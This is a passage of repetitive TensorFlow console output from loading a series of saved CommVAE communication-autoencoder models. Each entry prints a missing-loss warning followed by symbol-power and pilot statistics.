The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6547453 Model: 2.6547453 1.5363352817737106 1.1247366804829317 Pilots : [0.81466946 0.81466946]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317031629.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6736782 Model: 2.6736782 1.5325136022667443 1.13841458892891 Pilots : [0.81756929 0.81756929]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317032038.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.663229 Model: 2.663229 1.5093089260662806 1.1691015287896738 Pilots : [0.81597013 0.81597013]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317032447.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6578987 Model: 2.6578987 1.5542545303823707 1.1002569867544505 Pilots : [0.81515316 0.81515316]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317032856.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6806347 Model: 2.6806347 1.5311833449607148 1.1433606673944243 Pilots : [0.8186322 0.8186322]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317033300.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.630163 Model: 2.630163 1.5111425315356832 1.1517860077490514 Pilots : [0.81088886 0.81088886]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317033706.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.625495 Model: 2.625495 1.5111607659589283 1.1497140783290376 Pilots : [0.81016896 0.81016896]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317034115.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6563485 Model: 2.6563485 1.5573358730355908 1.095268181143637 Pilots : [0.8149154 0.8149154]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317034516.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.629759 Model: 2.629759 1.521327347999231 1.136241421625432 Pilots : [0.8108266 0.8108266]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317034925.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6526892 Model: 2.6526892 1.5297555402486511 1.1335542323207906 Pilots : [0.81435392 0.81435392]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317035331.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.656661 Model: 2.656661 1.5062462032065047 1.1709658120469575 Pilots : [0.81496335 0.81496335]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317035739.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.641728 Model: 2.641728 1.5609540603688001 1.0841961066901402 Pilots : [0.81266966 0.81266966]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317040142.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.5977073 Model: 2.5977073 1.557960894347686 1.0702299617603084 Pilots : [0.80587022 0.80587022]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317040551.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6464295 Model: 2.6464295 1.509091087627232 1.1620623400267527 Pilots : [0.81339252 0.81339252]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317040958.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.665893 Model: 2.665893 1.5470613462200618 1.113852429382457 Pilots : [0.81637814 0.81637814]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317041406.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6276734 Model: 2.6276734 1.5657284632249588 1.071861049592434 Pilots : [0.81050499 0.81050499]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317041814.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6856132 Model: 2.6856132 1.5446857563624197 1.1255458001665273 Pilots : [0.81939202 0.81939202]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317042222.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.648912 Model: 2.648912 1.534327514507683 1.125204283390623 Pilots : [0.81377392 0.81377392]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317042629.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6543865 Model: 2.6543865 1.5532779160916426 1.1001852747713796 Pilots : [0.81461441 0.81461441]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317043033.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.650795 Model: 2.650795 1.5264775601475693 1.137614951256492 Pilots : [0.81406311 0.81406311]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317043447.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6193957 Model: 2.6193957 1.5494914672553075 1.0909949433367445 Pilots : [0.80922737 0.80922737]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317043849.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6506119 Model: 2.6506119 1.5500603008617393 1.1031865356186719 Pilots : [0.81403499 0.81403499]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317044304.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.649116 Model: 2.649116 1.5064305717814812 1.1673544430744351 Pilots : [0.81380527 0.81380527]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317044710.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.651208 Model: 2.651208 1.5323988506199615 1.1290161490243142 Pilots : [0.81412651 0.81412651]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317045116.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.681797 Model: 2.681797 1.5665451011806981 1.0927985231598292 Pilots : [0.81880966 0.81880966]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317045525.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.647539 Model: 2.647539 1.5655483439161761 1.0802129605462407 Pilots : [0.81356298 0.81356298]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317045935.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.639749 Model: 2.639749 1.520522594284726 1.1417654219457234 Pilots : [0.81236523 0.81236523]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317050346.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6334257 Model: 2.6334257 1.5130478031973509 1.1503123248793732 Pilots : [0.81139166 0.81139166]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317050755.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6486862 Model: 2.6486862 1.5571913456174489 1.09231158863998 Pilots : [0.81373924 0.81373924]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317051202.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6560054 Model: 2.6560054 1.5386476196944614 1.121890866023225 Pilots : [0.81486278 0.81486278]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317051610.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6593866 Model: 2.6593866 1.5390656961933864 1.1227088988350045 Pilots : [0.8153813 0.8153813]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317052019.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6559947 Model: 2.6559947 1.5624972610070067 1.0878992242307983 Pilots : [0.81486113 0.81486113]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317052434.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6306071 Model: 2.6306071 1.5326809299378399 1.1198309978372882 Pilots : [0.81095732 0.81095732]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317052840.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6805923 Model: 2.6805923 1.5301685531585392 1.1448595748250379 Pilots : [0.81862572 0.81862572]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317053253.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6515455 Model: 2.6515455 1.5555125011689679 1.095852433693469 Pilots : [0.81417835 0.81417835]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317053659.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6641314 Model: 2.6641314 1.514852663537786 1.1609535717270694 Pilots : [0.81610836 0.81610836]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317054108.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6523495 Model: 2.6523495 1.5420633019690888 1.1153889610966834 Pilots : [0.81430177 0.81430177]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317054516.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6789947 Model: 2.6789947 1.5462136268788624 1.1205541655714932 Pilots : [0.81838173 0.81838173]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317054928.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6699567 Model: 2.6699567 1.5058466694563357 1.1774506402634586 Pilots : [0.8170001 0.8170001]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317055341.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6570888 Model: 2.6570888 1.587380345143562 1.0544938823083154 Pilots : [0.81502895 0.81502895]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317055748.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6796684 Model: 2.6796684 1.5747575586883418 1.0805718659897083 Pilots : [0.81848464 0.81848464]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317060153.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6674433 Model: 2.6674433 1.5705612146443702 1.081397736476063 Pilots : [0.81661547 0.81661547]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317060600.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6834226 Model: 2.6834226 1.5338368928847874 1.1405930173209522 Pilots : [0.81905778 0.81905778]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317061011.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6208935 Model: 2.6208935 1.5184811221846108 1.1366599969683793 Pilots : [0.80945869 0.80945869]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317061417.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.669094 Model: 2.669094 1.5308647154621284 1.1389122298879955 Pilots : [0.81686812 0.81686812]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317061825.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6719437 Model: 2.6719437 1.5252444768368076 1.1485459511383758 Pilots : [0.81730405 0.81730405]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317062233.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6368499 Model: 2.6368499 1.4798619718512382 1.2040457387710786 Pilots : [0.811919 0.811919]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317062641.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6116362 Model: 2.6116362 1.5236605577585571 1.1249577778929398 Pilots : [0.80802787 0.80802787]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317063053.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6257353 Model: 2.6257353 1.5087367799698985 1.1535169607941256 Pilots : [0.81020604 0.81020604]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317063500.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6636188 Model: 2.6636188 1.5257204868751255 1.144253149129742 Pilots : [0.81602984 0.81602984]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317063909.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.657931 Model: 2.657931 1.5187059403285272 1.152381648854077 Pilots : [0.81515813 0.81515813]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317064315.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6103325 Model: 2.6103325 1.540463314272075 1.1000010721047493 Pilots : [0.80782617 0.80782617]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317064721.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.668388 Model: 2.668388 1.522434163644044 1.1512560326921077 Pilots : [0.81676005 0.81676005]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317065126.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6681242 Model: 2.6681242 1.5476584724502285 1.1139245682595516 Pilots : [0.81671969 0.81671969]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317065532.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6767244 Model: 2.6767244 1.569571291910721 1.086529619409065 Pilots : [0.81803491 0.81803491]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317065936.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6938062 Model: 2.6938062 1.5529639026929576 1.1169754334927409 Pilots : [0.82064093 0.82064093]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317070344.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.673153 Model: 2.673153 1.515292224126458 1.1642091680966846 Pilots : [0.81748898 0.81748898]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317070752.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.644737 Model: 2.644737 1.5470621204836468 1.105011980486865 Pilots : [0.81313237 0.81313237]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317071158.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6562362 Model: 2.6562362 1.52704334724338 1.139105518680364 Pilots : [0.81489818 0.81489818]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317071604.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6843255 Model: 2.6843255 1.5373298585266026 1.1357978583869197 Pilots : [0.81919556 0.81919556]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317072011.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6932008 Model: 2.6932008 1.5338741053046936 1.1446937392377694 Pilots : [0.82054872 0.82054872]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317072419.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.640733 Model: 2.640733 1.548575167476123 1.1011840486479247 Pilots : [0.81251662 0.81251662]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317072824.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6943588 Model: 2.6943588 1.5853310603166861 1.072051122858724 Pilots : [0.82072511 0.82072511]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317073229.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.7087574 Model: 2.7087574 1.5046078366066846 1.1965296693207252 Pilots : [0.82291515 0.82291515]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317073637.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.667937 Model: 2.667937 1.5192431074949584 1.1559020319536049 Pilots : [0.81669104 0.81669104]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317074044.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.652684 Model: 2.652684 1.575068510572551 1.0692681124136825 Pilots : [0.81435311 0.81435311]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317074455.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.68427 Model: 2.68427 1.5521609337855835 1.1141731420242653 Pilots : [0.81918708 0.81918708]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317074900.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.7010121 Model: 2.7010121 1.5427186335918104 1.1348882119092805 Pilots : [0.82173781 0.82173781]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317075309.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6312568 Model: 2.6312568 1.5208127187196145 1.1376581091446107 Pilots : [0.81105746 0.81105746]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317075718.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6565175 Model: 2.6565175 1.515018052457585 1.1573829135019555 Pilots : [0.81494133 0.81494133]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317080126.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.678814 Model: 2.678814 1.5428937805557597 1.1253056322217574 Pilots : [0.81835413 0.81835413]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317080534.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6800303 Model: 2.6800303 1.527714928237571 1.1482992118798288 Pilots : [0.81853991 0.81853991]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317080939.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6361227 Model: 2.6361227 1.5309994843448833 1.124645196440853 Pilots : [0.81180704 0.81180704]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317081348.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6690636 Model: 2.6690636 1.5617856381169717 1.0942487714800722 Pilots : [0.81686345 0.81686345]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317081753.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6030016 Model: 2.6030016 1.490932667750487 1.1710039845592575 Pilots : [0.80669102 0.80669102]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317082157.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6665032 Model: 2.6665032 1.5444930128480445 1.1178157174453718 Pilots : [0.81647155 0.81647155]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317082605.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.640194 Model: 2.640194 1.5486606951481365 1.1008376574251375 Pilots : [0.81243368 0.81243368]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317083010.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6731877 Model: 2.6731877 1.5115569572820948 1.1699853570050893 Pilots : [0.8174943 0.8174943]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317083426.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6159625 Model: 2.6159625 1.513075068464374 1.1426430024812735 Pilots : [0.80869687 0.80869687]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317083835.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6432285 Model: 2.6432285 1.5496291436955894 1.1007258413989698 Pilots : [0.81290044 0.81290044]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317084251.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
